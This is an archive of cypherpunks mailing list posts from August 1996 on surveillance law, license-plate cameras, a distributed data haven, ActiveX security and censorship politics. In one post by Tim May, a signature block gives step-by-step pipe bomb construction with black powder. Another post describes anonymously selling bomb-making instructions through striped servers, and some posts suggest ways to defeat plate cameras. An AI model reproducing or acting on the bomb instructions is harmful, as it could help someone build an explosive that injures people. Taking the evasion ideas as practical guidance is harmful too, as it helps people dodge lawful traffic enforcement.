> actually whitewash my fence and then mow my lawn.  All at NO COST to
>  you."
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMhKREMtPRTNbb5z9AQEyywgAwvmF9zh46X6KpgprzbTEWsl2v8MFCOU0
s5LVvO8gt3IN3GRWAGaMsmsAuDhP7KdyG7UGSuJlstPd0sJWO+7vw6XDn4kZhsZH
/3aN0FVwYJJOf51rEmHOYc0JagNRUlRIMtkiRr019JRmb+7s+6uO6B6r1ojT0SCe
NOS8lHOGUOqD2OaYX8vhg2nH18AwNn+WRPsURCkcp3xhF9T3PiDasvYVCsirizqL
ePk8NcOIrTR9eEp1rfTkOpx5jfG/2Q5epOrwx0a4UD/6AWebnrX0bPQC1mXtTU1P
BDVDtYtgJo0YIDtDjoLqsjnSeni4ZjyVLoTc80dQgrXJN9V7g+PiFQ==
=pU+b
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 13:39:19 +0800
To: cypherpunks@toad.com
Subject: Burden of proof
Message-ID: <ae37e59e070210042a4f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:53 AM 8/15/96, Alan Horowitz wrote:

>In the USA, we have a system that ensures that the burden of proof is on
>the accuser.

Which explains why in the  U.S. the tax authorities take the money first
and then require the citizen to be the "accuser" in Tax Court, pleading to
get his seized assets back.

(To outsiders, the U.S. tax authorities have broad powers to seize
properties without any court process, to attach wages, to deputize
employers and banks as unpaid tax collectors, and to harass citizens.
Citizen-units may sue, of course, but the burden of proof is on them to
prove that they are owed a refund. A man who saves money and puts it in his
mattress can have it seized and taken from him. He must produce proof that
it is his money, never mind that he already paid taxes on it and never mind
that there is no way someone who saves currency can have a proper paper
trail. So much for "burdens of proof.")

--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 15 Aug 1996 13:42:04 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [off-topic] Locating cell phones with power off?
Message-ID: <v02120d0eae384741d4cf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: 2.6.3

hQEMAy1onm9OaF05AQf9HrOT3gvf+p/v9oNWcClCrgNPxHqR3Ro+Ai3OdYJOgmPK
neIs5I7bQ0g4vfdN/T1daZRXMhmwIBD0JUZeZqjNGYHczBT5poxQSgrruHx3dHa6
hvZDRkH4YV2nynRWpQ3tGcsMPiEU2yHIfG8ts8XGF4AoikCPSAy4rJaZl856V5KM
1K5lLZA+kL5meAGaN4o0HxTnNU3KxPctKd1UJUruZvDSBx03rYYGGLIlI6i0JCA8
3lCPcIGFhEehV8UWy9xdoinM5oF23hB80gIEtrV//dpXk9aKE6OfKs0d6lTO1Gq/
EDIxgKnwOvX+zGd6UjubvomfH1Z+GOVtQi7oFHlvaqYAAAGQj8eyiz0s8Sgq3c7a
eIxcUZ5TwMgFnfCFTuJrXZ5K4/pVdPAMvDZzGXI6J/1Fry89NQ3zup34RbR2HxTz
E64QgkF+mzrWu18SaVgggHAwxhpje56ahbolX4E72l/LN3y/FiDhiBL33jxcBwuD
DztcLr/4wbE3Van+luAvYBKJ7tueEiv0JGcl0jHFo3DOAyC+11qeouSir36SlBKs
Aj3oBhYwaC9op/RAZlzXyq3wqnnrqHKG7MGOrIRjJdId2i8QTGVtATKDQwn9eZ+U
AQftEaIEyzxo/IKeCiLjFFTeGFYDg9F7vwJbYNA14T5RBqmom6XsHvRVpfiHmhxn
YnD0ULKGl2VNX+E/v2uacpjIWglULaWARO4pjbPHl8YNryGbYfTt3LOYCZVtfwM2
li8ZJjuaJuoXultzBIkAsDes0JTIW929gsWPjnTsMn9yPb0fy1Ia1W3czF0v/Fwx
MpYbUalRKqi7Tg1WlkBDra4AEW60oUBpHbQaccSZ5xDrCu/HzlPAaeloQAwdLFF+
MDX2vg==
=jH3M
-----END PGP MESSAGE-----


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an681132@anon.penet.fi
Date: Thu, 15 Aug 1996 08:58:24 +0800
To: cypherpunks@toad.com
Subject: No subject
Message-ID: <9608142122.AA20589@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> Preiously, jim bell <jimbell@pacifier.com>
> <snip>  However, hours after it was publicly revealed that the Atlanta 
> 911 center screwed up, wasting 10 minutes looking up the address of 
> "Centennial park,"  <snip>

After watching the news during the coverage of the 911 call, I couldn't
help but  notice the free computer advertisement.  I don't suppose that
                             GATEWAY 2000
will be doing too much  bragging about supplying systems to the Atlanta
911 call center.  Gosh, I wonder what systems my local 911 call  center
uses?     Would    they    be     able    to    find     my    address?

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an681132@anon.penet.fi
Date: Thu, 15 Aug 1996 08:50:00 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
Message-ID: <9608142123.AA21144@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> Preiously, jim bell <jimbell@pacifier.com>
> <snip>  However, hours after it was publicly revealed that the Atlanta 
> 911 center screwed up, wasting 10 minutes looking up the address of 
> "Centennial park,"  <snip>

After watching the news during the coverage of the 911 call, I couldn't
help but  notice the free computer advertisement.  I don't suppose that
                             GATEWAY 2000
will be doing too much  bragging about supplying systems to the Atlanta
911 call center.  Gosh, I wonder what systems my local 911 call  center
uses?     Would    they    be     able    to    find     my    address?

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 15:53:39 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
Message-ID: <199608150454.VAA12982@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 8/13/96 -0400, Alan Horowitz wrote:
>> If foil or metal mesh would block it, then many recently built houses
>> would be already set.  Usually that 1/2 - 1 inch styrofoam used 
>> on almost all exterior walls has a reflective layer of foil to help
>> keep the heat/cold out.

>Take a course in Tempest practices.  Casual residential practice 
>implemented by construction workers do not a vault make.

The context of the discussion wasn't TEMPEST (as you say,
it's not enough for that), but new high-frequency hand-held radar imaging,
which ostensibly uses radio emissions from human skin or some technique
to create images.  Foil-backed insulation ought to do a good job
stopping that, as well as making infared snooping less useful.

Now, the police _claim_ that the product that lets you see the
shape of objects under people's clothes has the resolution to find
guns and knives and non-naughty-bits of human flesh, but not enough
to let those dirty-minded privacy-invaders leer at their victims.  Uh huh.
At least they probably don't come with printers or data links,
so they'll just have to leer at the screen and not save and distribute
copies....  Somebody ought to complain to Phyllis Schlafly about this!

[less serious material follows:]
[Not only will you need the tinfoil lining to your hat, you'll have
to get some metallic-lined underwear to avoid being entrapped into
aiding and abetting police pornographers.  Maybe Erik's gold-lame' suggestion
will catch on, at least here in San Francisco....]

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 15 Aug 1996 12:35:29 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: [NOISE] Re: photographed license plates
In-Reply-To: <v03007802ae36fdc0b789@[17.219.103.200]>
Message-ID: <Pine.SV4.3.91.960814215051.9546B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Amazing how people forget that Sweden is, in fact, a monarchy. The king 
doesn't exercise his absolute power of life and death over his subject - 
he has appointed that to his government.

There is no liberty in Sweden. Merely googood humour on the part of the 
Sovereign.

In the USA, we have a system that ensures that the burden of proof is on 
the accuser.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Thu, 15 Aug 1996 16:55:02 +0800
To: cypherpunks@toad.com
Subject: Jurisdictionless Distributed Data Havens
Message-ID: <3212B0CB.1AB7@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


With all of the debate on offshore data havens, I've been thinking of a
way to implement a distributed data haven that would not be subject to
(hopefully) any local jurisdiction and therefore, would not need to be
located in the place of cypherpunks wet dreams ;). If this idea has been
mentioned by someone else, I am not aware of it. By distributing the
data over several servers (using RAID like striping), compromise of a
single or multiple servers (depending on implementation specifics) would
not cause a collapse of the data haven.

Here is a way such a data haven could be setup:

The data is split into multiple parts. Each site is responsible for
maintaining only its part. For a client to access a piece of data, he
will have to contact a certain number of sites to reconstruct the data.
The client could also use some sort of anonymizer service to do the data
collection and then do then combining on his local machine.

If one site gets shut down by Big Brother, denial of service attack,
etc., the other sites either find a new site to replicate the missing
part to, or they need to reconstruct the data and re-stripe it for the
remaining servers. (Read any networking book with a section on RAID to
see what all this means.)

Another idea is that the data can be encrypted, and the client pays the
key-holder for the key. The key holder would preferably be the content
provider and not one of the servers. i.e.: Client finds Bombs R Us and
wants to buy pipe bomb instructions. Bombs R Us gets anonymous payment
from client for the instructions. Bombs R Us says to client: "collect"
page 5 "parts" and use this key to decrypt. In this scheme, using
anonymous digital cash, Bombs R Us can remain anonymous with his data
publicly available but encrypted. He can pay each of the server
maintainers in anonymous digital cash as his expense. Each server cannot
(or should not) be held responsible for disseminating bomb making
instructions because each server does not *have* the instructions in a
complete form (encrypted or otherwise). It would be like someone calling
the cops and saying, I placed a box with XXXXX in it at the airport.
This in itself is not a threat. XXXXX could be anything, including OJ
Simpson's bloody clothes. And if another guy called in and said "pipe
bomb" and hung up, this is meaningless also.

The reason data striping is better than a simple mirroring network is
that no single site contains anything useful in itself for the
authorities to use against the server maintainer. (Similar to a remailer
network perhaps)

An extra feature could be if some major attack was initiated against the
data haven, there could be a dead-man button of some sort to make the
data vanish altogether by sending distress signals to the other servers
(or to at least one server, which could then cascade the signal).

The system could either use RAID Level 5 data striping, or some hybrid
scheme like this:

Site 1 has bits 1 and 5 of data
Site 2 has bits 2 and 6 of data
Site 3 has bits 3 and 7 of data
Site 4 has bits 4 and 8 of data
Site 5 has 2 parity bits (1 parity bit per nibble)
Site 6 has bits 1, 2, 3, and 4
Site 7 has bits 5, 6, 7, and 8
etc.

In this particular scheme, it would take the downing of at least 3 of
the 7 servers to prevent data collection. It would also take at least 2
sites worth of data to reconstruct the data into a usable form. As much
or as little redundancy as needed can be built into the system.

The only time the data is in it's whole is prior to being stripped
across the servers, during data recreation and re-striping, and when in
the hands of the client.

Benefits:

* No single site contains any incriminating evidence

* Allows for a true "virtual company" to exist, with just a mail-box to
receive it's anonymous digital cash payments


Problems:

* Requires a re-striping of data when the data source is changed

* Requires a data regeneration and re-striping when a site goes down and
a replacement site can not be found (could possibly use an idle standby
server to circumvent this problem)

Attacks:

* Government sabotages site 1, then watches site 2 for data regeneration
before re-striping (Can be thwarted by having data regeneration
happening on a randomly picked server)

Clarifications:

When I say digital cash, I am not referring to Chaum's DigiCash.
DigiCash will never work in my book because it requires an account,
amongst other reasons. YMMV.

Comments welcome.

Kevin Stephenson

-Silence is Security
	WWIIish Poster




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Prisoner <null@void.com>
Date: Thu, 15 Aug 1996 15:17:03 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
In-Reply-To: <ae37be1d02021004e289@[205.199.118.202]>
Message-ID: <3212B1B0.2327@void.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> [WHACK]

> Maybe we'll have barcoded license plates sooner than we think. Then all of
> those speed cameras can also track our movements.
> 

No, too low-tech.

Small trasnsmitters with unique programmed ID codes broadcast as you drive.  Much easier to trace.  And LoJack's 
already got a good bit of the technology in place.

Or your GPS co-ords could be stored/buffered onboard, and uploaded to the Central Bureau every night for 
analysis.

This is the kind of forward thinking that Creates Jobs!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 15 Aug 1996 13:18:18 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
Message-ID: <199608150313.WAA08490@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Aug 1996 22:24:39 -0400 (EDT)
> From: Black Unicorn <unicorn@schloss.li>
> Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
> 
> Correct.  No warrant is required to observe that which is freely collected
> after eminating from the residence of another and observed off his
> property.
> 
> Same concept applies to the "sniff" test and ariel views into greenhouses.

Pitty somebody doesn't bring a suite against the FCC under this logic. It
would particularly impact radar detectors, cell phones, and other types of
scanners.

                                                 Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 16:41:43 +0800
To: "Dan Siemon" <dsiemon@cyg.net>
Subject: Re: Fun with M$
Message-ID: <199608150518.WAA13323@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:07 AM 8/12/96 -0400, Dan Siemon wrote:

>> > Exploder is an Active X control which demonstrates security problems with 
>> > Microsoft's Internet Explorer. Exploder performs a clean shutdown of 
>> > Win95 and will turn off the power on machines that have a power
>> > conservation BIOS (green machines).
>
>I don't see how anyone can call this a bug. 

If somebody can write a web page that, when you view it, turns off your PC,
the only way I can see calling it a positive feature is to say 
"it's easy to make people stop using really insecure products like MSIE!" or 
"Turning off Win95 is a Kind Thing to do!"

>Microsoft has chosen what Sun should have: leave the security to the user,
>don't take it away from everyone.  Java has been severely crippled by the 

User?  What user?   The poor unsuspecting fool who hits the web page?
The kind friendly person who writes web pages that turn off Win95?
Executing signed code from web pages is semi-ok, if the default is to
trust no one and make the user explicitly grant permission to code authors.
Executing anything that comes down the wire is foolish, and writing
software to do so is rabidly negligent.

The Java approach is to define a security model that _should_ let you
safely execute code if you implement it correctly, do some academic-style
analysis to validate the security model, document the level of
trust you can expect from the system, and then put out a mildly buggy
implementation of the system so grad students can rip it to shreds :-)
So far the security problems that have been discovered have been with
the implementation, not with the underlying security model.
And then add a similar-looking language called Javascript with no
underlying security model, make it impossible to turn off, and get 
taunted mercilessly until you add a "Turn it off" checkbox.

The Microsoft approach was to take a hacked-up word-processor gluon,
from the folks who brought you the Word Prank Virus Propagation Tool,
hack it up some more, add Internet hooks, and replace a few bugs with
different bugs while trying to catch up with the market leader on features.
Yes, some of the removed bugs were security bugs, but it's nothing near
secure, and there's no reason to expect it ever can be.

(Brought to you by the folks who added features to Winsock so that
their PowerPoint disk-hogging-and-slideshow system chokes to death
if you install standards-based networking software, even if you
don't use the network features....)



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Aug 1996 12:49:37 +0800
To: geoff <geoff@commtouch.co.il>
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <19960813152643711.AAA272@[194.90.26.157]>
Message-ID: <Pine.SUN.3.94.960814221834.28297A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, geoff wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: cypherpunks@toad.com
> Date: Tue Aug 13 18:39:12 1996
> 
> on Aug 13 Sean Sutherland wrote:
> 
> > Whatever happened to that free offer for ProntoSecure for members of
> > the Cpunk list?  Remembered hearing something about it awhile back, 
> > but I don't know exactly what it is.  Thanks.
> 
> The offer is still on. A free copy of Pronto Secure in exchange for 
> feedback. Open to anyone on the c'punk list.

"Do all the work I should be doing or have done in the first place
discover the critical flaws in my new-keen-o-ka-jive-o crypto system and I
will give you a free copy of a critically flawed crypto system (a $99.00
value) ABSOLUTELY FREE.  Wait, don't order yet.  Included you also get to
actually whitewash my fence and then mow my lawn.  All at NO COST to you."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Aug 1996 12:54:31 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
In-Reply-To: <v02120d0cae366bab297f@[192.0.2.1]>
Message-ID: <Pine.SUN.3.94.960814222314.28297B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, Lucky Green wrote:

> At 9:27 8/13/96, Peter Trei wrote:
> 
> >I vaguely remember another possibly relevant precedent, where a
> >judge ruled that a warrant was required before a thermal imager
> >could be used to look at a house suspected by the police of
> >being a (pot) grow house.
> 
> Wrong. No warrant was used and the bust was upheld in court.

Correct.  No warrant is required to observe that which is freely collected
after eminating from the residence of another and observed off his
property.

Same concept applies to the "sniff" test and ariel views into greenhouses.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Aug 1996 13:16:32 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: photographed license plates
In-Reply-To: <199608132339.TAA01485@nrk.com>
Message-ID: <Pine.SUN.3.94.960814222805.28297C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, David Lesher wrote:

> I note those plastic cover for plates "to keep them clean"
> seem to be more & more popular.

As are plates with polarized lenses which obscure any view of a plate at
an angle of less than about 80 degrees.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Aug 1996 13:07:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
In-Reply-To: <199608132155.OAA09738@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.960814222939.28297D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, jim bell wrote:

> At 09:27 AM 8/13/96 -6, Peter Trei wrote:
> >
> >Tim writes:
> >
> >> I don't see how "remote scanning" of the population at large, without
> >> probable cause, is much different from the cops listening in from a
> >> distance with parabolic antennas. Both cases involve detection of signals
> >> emitted from the target. And yet such long-distance interception is not
> >> allowed without a warrant.
> >
> >I vaguely remember another possibly relevant precedent, where a
> >judge ruled that a warrant was required before a thermal imager
> >could be used to look at a house suspected by the police of
> >being a (pot) grow house.
> >Peter Trei
> >trei@process.com
> 
> There was just such a decision in Washington state about a year ago, as I 
> recall.  However, as I recall there has been a contradictory decision 
> elsewhere, so the law isn't clear.

The decision you refer to was effectively overruled.

> 
> It seems to me that the main problem with such "evidence" is not the search 
> itself, but the interpretation of the results:  Having a hot house isn't a 
> crime, and indeed it was not practically detectable before IR viewers.  And 
> an IR viewer only tells you the house is hot; it doesn't say why its hot.  
> Apparently, when the "justice system" gets a new toy, it subtly adjusts its 
> standards to use that toy, regardless of minor issues such as right and 
> wrong.  
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 15 Aug 1996 17:13:43 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Schlafly on crypto
Message-ID: <2.2.32.19960815053035.00fc9d90@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 8/14/96 -0700, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Wed, 14 Aug 1996, Alan Olsen wrote:
>
>> Well, I can think of a few reasons to come to that conclusion.  
>> 
>> - Schlafly is the head of one of the more right-wing
>> organizations in the country.  
> 
>Some right-wingers don't like free speech, most do.  This 
>characterization is not enlightening on the question at hand.

Actually, i have found that it does not matter which side you choose, right
or left, they desire free speech for themselves and not for others.

>> - She is very closly associated with the Buchanon campaign and
>> the Christian coalition.  
>
>Does Buchanan favor censorship of the Net?  If so, what leads you
>to believe Schlafly shares that particular view?  This guilt by
>(assumed) association is not fair nor persuasive.

I am not certain about Buchanan, but i do know that the Christian coalition
is very much in favor of net censorship.  Actually, I can find no statements
in either direction on the Eagle Forum web site. 

Do you know of any statements by Schlafly and/or the Eagle forum either for
or against net censorship?  I know of none for, and the circumstantial
evidence available does not reinforce the conclusion that she is against it.

>> - Her organization, the Eagle Forum, distributes a couple of
>> anti-porn rant tracts (http://www.eagleforum.org/users/eagle/
>> public_html/misc/order.html) called _Pornography's Victims
>> $4.95 (paperback) by Schlafly, ed._ 
>
>Being against porn does not mean one is pro-censorship.  (I don't
>like smoking, but I don't think it should be illegal.)  We need
>something more concrete to support such an accusation.

I have yet to see anyone who publishes anti-porn screeds based off of the
Bundy case that does not support censorship of such materials.  Can you
point me to any?  Or any material that would lend credence to the argument
that she supports freedom for anyone except "Good God-Fearing Christians"?

>> I know that he [Phyllis' son] is gay.  His mother seems to have
>> had some problems coming to terms with the implications of alot
>> of her rhetoric involving such things...
>
>Really?  I though she very clearly has stated that she hates the
>sin, not the sinner.  What evidence does Alan have that she has
>had "some problems coming to terms..."?

Lon Mabon also claims to "hate the sin and love the sinner".  It does not
prevent him from dredging up as much hate as possible for those who are gay.
Actually my beliefs are based opon statements she made at the time.  You may
have more information on the subject than I do...  

>> (She seems to confuse her religion with reality on this point.)
>
>As does Alan.

Without evidence to back up your claims, I cannot make any judgement than
what I have made.  Her associations with people who believe in censorship
and her devotion to a branch of Christianity that supports censorship, as
well as her sales of publications used to justify censorship makes me
believe that she follows that course.  Without specific examples that show
that she does not believe in such measures, I have no reason to assume any
other conclusion.
 
>> I would say there are alot of reasons to assume that Schlafly
>> would try and impose her morality on the rest of the country if
>> given half the chance.
>
>Well Alan can say anything he wants, but he has given no 
>*substantive* reasons to support his prejudices.  By her article
>against Net censorship, Schlafly has given us at least one piece
>of evidence to the contrary.

Has she published against net censorship?  The quoted article was about
wiretapping.  My search of her web site did not reveal any articles on that
topic.  If you have specific pointers I would like to see them.

>> Look at the people she chooses to associate with.
>
>Jesus hung out with tax collectors and prostitutes.  Look at the
>people he chose to associate with.  Guilt by association again?

But Jesus did not try to get the prostitutes and tax collectors elected to
high office...  (But then again, there are no contemporary records for the
existence of such a being in the first place.)

>Look folks, in this battle, "the enemy of my enemy is my friend."

Actually I view this as a fallacy.  Just because the Christian Right opposes
Clinton for good reasons, does not make them friends for causes that I view
as just.

>We KNOW what Clinton and his gang think of our privacy and 
>freedom of speech on the Net.  Let's not cut off our noses to 
>spite our faces.  If Schlarly wants to lend a hand, let's not
>bite it, okay?

Lets also not accept them just because they oppose the current threat.  I
believe they have a number of threats of their own.

I do not disagree with the Eagle Forum on everything.  (I have just read
enough of her early works to make me consider her a danger to herself and
others...  Especially her screeds on Communism.)  She has some points I
consider valid on education and other areas.  But just because he makes
sense in some areas does not mean that I will trust either her or any of her
minions in any position of power.  Control freaks of either stripe worry me...

If they are willing to fight against the Clintonocracy, then i will be glad
to see it.  Just do not expect me to be willing to swallow their religious
beliefs as an alternative.

If you have pointers to material that shows that she is against net
censorship, then post pointers.  I would like to see them.  The posted
article does not address the net at all, other than as communication on a
one to one basis.  It does not address the issues of those who post
unencoded messages to the public at large.  Until I have text that shows
otherwise, i have little data to show that she supports freedom of speech
other than on a one to one basis.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Aug 1996 13:02:59 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [off-topic] Locating cell phones with power off?
In-Reply-To: <v02120d07ae3717374bfb@[192.0.2.1]>
Message-ID: <Pine.SUN.3.94.960814223329.28297E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, Lucky Green wrote:

> I seem to remember that somebody once mentioned that cell phones transmit
> signal even with the power switch off. Supposedly, you have to take out the
> batteries to cut the signal. The more I am thinking about it, the less
> sense it makes. Can somebody here please confirm (or deny) this rumor?
> 
> TIA,

Playing about with my phone and frequency counter, I get no signal at all
with power off but battery in.

> 
> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
>    Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
>    Vote Harry Browne for President.
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 15 Aug 1996 16:42:32 +0800
To: Bill Stewart <alanh@infi.net>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible  searches
Message-ID: <2.2.32.19960815053848.00f05a5c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 PM 8/14/96 -0700, Bill Stewart wrote:

>[less serious material follows:]
>[Not only will you need the tinfoil lining to your hat, you'll have
>to get some metallic-lined underwear to avoid being entrapped into
>aiding and abetting police pornographers.  Maybe Erik's gold-lame' suggestion
>will catch on, at least here in San Francisco....]

Maybe chainmail will come back in style.  (Why does the SNL skit of Dan
Ackeroid trying to get through the metal detector covered in chains and
metal fetish gear come to mind...)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 15 Aug 1996 13:24:05 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: photographed license plates
In-Reply-To: <Pine.SUN.3.94.960814222805.28297C-100000@polaris>
Message-ID: <199608150242.WAA07974@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 13 Aug 1996, David Lesher wrote:
> 
> > I note those plastic cover for plates "to keep them clean"
> > seem to be more & more popular.
> 
> As are plates with polarized lenses which obscure any view of a plate at
> an angle of less than about 80 degrees.

I wonder if the answer isn't those corner reflector prisms?
The machine usually has a flashtube. If you make a licence-plate
frame with them around the edge......


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Prisoner <null@void.com>
Date: Thu, 15 Aug 1996 15:50:37 +0800
To: cypherpunks@toad.com
Subject: forget photographing license plates!
Message-ID: <3212B8F9.367A@void.com>
MIME-Version: 1.0
Content-Type: text/plain


from comp.risks:


Date: Tue, 13 Aug 96 15:52:22 PDT
From: Greg Dolkas <greg@core.rose.hp.com>
Subject: RISKy cars coming!

"In the 22 Jul 1996 issue of Fortune was an interesting look into the future
of automobile electronics, "Soon Your Dashboard Will Do Everything (Except
Steer)".  "

>>> Does that include reporting your movements to the Central Bureau?

"The topic of steering has already been discussed in this forum,
but what caught my eye was a review of the "OnStar" product from GM.
Besides being a navigation aid, it also contains "some anti-bonehead
features".  "

>>> Thank God people keep trying to save me from myself.

"These include the ability for you to call GM's "control center"
for help if you lock your keys in the car, or forget where you parked it.
>From the control center, they can "electronically reach into the car" to
unlock the doors, or honk the horn and flash its lights."

